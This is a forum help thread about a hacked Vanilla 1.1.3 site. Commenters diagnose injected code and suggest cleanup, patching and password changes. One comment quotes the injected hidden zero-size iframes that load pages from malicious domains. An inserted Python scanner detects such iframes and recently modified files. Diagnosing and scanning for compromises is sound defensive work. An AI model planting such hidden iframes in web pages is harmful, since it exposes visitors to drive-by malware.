
Trojan Hack?

Horton (New)
edited September 2008 in Vanilla 1.0 Help
The facts: I am using Vanilla 1.1.3 hosted via GoDaddy. I have not made any edits to any settings in at least a few weeks, if not months. Today my users started complaining that they were getting Trojan messages from their anti-virus software. I saw it also but did not write down the name before the pop-up went away. JS… something. (I know that does not help.)

Another note that may mean nothing… When I looked at my site I saw that the Vanilla PHP file and the two HTML files in the vanilla root showed that they have last-change dates of a few days ago. I did not do that…

Using:
Attachments 2.1
Google Analytics 1.2
JQMedia 0.6.3
ModTools 0.06.10b
Nuggets 1.1.3
Poll 1.3
Tinymce 1.4.1

See for yourself if that is a good idea..... http://ballofspray.com/vanillaforum/

Comments

  • Clean up your server and report it to your provider. He might be able to help you find out how it happened.
    Look at your logs; you might find weird requests.
  • TomTester (New)
    edited September 2008
    WARNING TO OTHERS: DO NOT ACCESS HORTON'S SITE UNLESS YOU RUN A SANDBOXED BROWSER

    Horton, checked out your site. It's indeed hacked. Every page has lines of code inserted at the bottom, leading to dangerous sites (edit: spaces added to disable auto-linking):

    <iframe src="http:// msn-analytics. net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    <iframe src="http:// pinoc. org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

    My NOD/ESET blocks msn-analytics.net for trojan attacks.
    http://safeweb.norton.com/report/show?name=msn-analytics.net
    http://safeweb.norton.com/report/show?name=pinoc.org

    I see this article outlining how it was done and help fixing it (may require editing of path in perl script, look at source): http://blog.floogy.com/2008/08/fix-pinocorg-and-pinocinfo.html

    Contacting your ISP is still your best bet, because it seems the vulnerability may be related to setup of the server (TMP dir). Hope this helps. TT
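An added example, not code from the thread or from Vanilla: a small Python scanner for the two symptoms described above, hidden zero-size iframes appended to every page and PHP/HTML files whose modification time changed when nobody edited them. The sample page, the example.invalid domain and the function names are constructed for illustration.

```python
import re
import time
from pathlib import Path

# Zero-size iframe: an <iframe> tag carrying both width=0 and height=0
# (quoted or unquoted, any attribute order), as in the injected markup above.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b(?=[^>]*\bwidth\s*=\s*[\"']?0\b)(?=[^>]*\bheight\s*=\s*[\"']?0\b)[^>]*>",
    re.IGNORECASE,
)
SRC_ATTR = re.compile(r"\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.IGNORECASE)

# Constructed sample page; example.invalid stands in for the real drop domains.
SAMPLE_PAGE = """<html><body><p>Forum index</p>
<iframe src="http://example.invalid/count.php?o=2" width=0 height=0 style="hidden" frameborder=0></iframe>
<iframe src="https://video.example/embed" width="560" height="315"></iframe>
</body></html>"""


def find_hidden_iframes(html):
    """Return the src of every zero-size iframe found in the HTML text."""
    hits = []
    for tag in HIDDEN_IFRAME.finditer(html):
        src = SRC_ATTR.search(tag.group(0))
        hits.append(src.group(1) if src else "<no src>")
    return hits


def assess_file(name, text, mtime, now=None, recent_days=7):
    """Flag a file if it carries a hidden iframe or was modified within recent_days."""
    now = time.time() if now is None else now
    iframes = find_hidden_iframes(text)
    recent = mtime > now - recent_days * 86400
    if not iframes and not recent:
        return None
    return {"file": name, "iframes": iframes, "recently_modified": recent}


def scan_webroot(root, recent_days=7, exts=(".php", ".html", ".htm")):
    """Walk a web root and collect findings for every PHP/HTML file in it."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            text = path.read_text(errors="replace")
            hit = assess_file(str(path), text, path.stat().st_mtime, recent_days=recent_days)
            if hit:
                findings.append(hit)
    return findings
```

Call scan_webroot("/path/to/webroot") from a Python shell to get the list of flagged files; a recent mtime on a file you did not touch is the same signal Horton noticed by hand.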
  • I am clearing out everything and restoring back a week. Makes me so mad.
  • So I am going to reset my passwords as soon as the site is restored. Any other ideas? Am I right that a bot broke my FTP password and wrote to my server at GoDaddy?
  • I have now reset the whole freak'n site back a week and changed my FTP passwords to be as strong as I can figure (uppercase, lowercase, numbers and symbols - 14 digits). Is there anything else I need to do to keep this from happening again?
  • Check version numbers of everything installed on the server, most popular software first, and if there is something newer, update it.

    Vanilla will come out with 1.1.5 shortly, so you can save that for last.
  • I don't think that FTP is the culprit. That's too cumbersome and easy to detect (by the ISP). Vanilla 1.1.3 is/was temporarily insecure, see: http://www.milw0rm.org/exploits/4548 Install the latest version of Vanilla.

    Note: the pinoc issue occurred most on servers with an older Joomla install. If you have that installed (even if you're not using it) just remove it. If you use other popular open source tools, check them on http://www.milw0rm.org/search.php (note: hacker site) or www.secunia.com (note: non-hacker site) to see if they have vulnerabilities or need updates. TT
  • edited September 2008
    As far as I know the only security issue in Vanilla core that would have allowed injection in HTML or PHP files was in Vanilla 1 (it did require register_globals being on).
  • milw0rm script says:

    ## Vanilla <= 1.1.3 Remote Blind SQL Injection Exploit
    ## By InATeam (http://inattack.ru/)
    ## Requirements: MySQL >= 4.1, magic_quotes_gpc=Off
    ## Tested on versions 1.1.3, 1.1.2, 1.0.1
  • edited September 2008
    I know the vulnerability in 1.1.3 is severe, but I don't think it would have allowed injecting code into the files.
  • Sorry Dino, I did not read your previous reply properly. I agree that Vanilla 1.1.3 probably isn't the 'attack vector' used to make changes on the server. Suspect Horton has other software installed which isn't fully patched. Being that the trojan was Pinoc, Joomla is the most likely origin.
  • OK, so if Vanilla and FTP passwords are not the issue?!? I have a WordPress install that I do not use and a couple of Coppermine installs. Not anything else that I can think of. Whatever the path to corruption is, my home page literally had code added to it. I would roll forward to the latest Vanilla, but since I am not a PHP programmer, if something breaks I am screwed.
This discussion has been closed.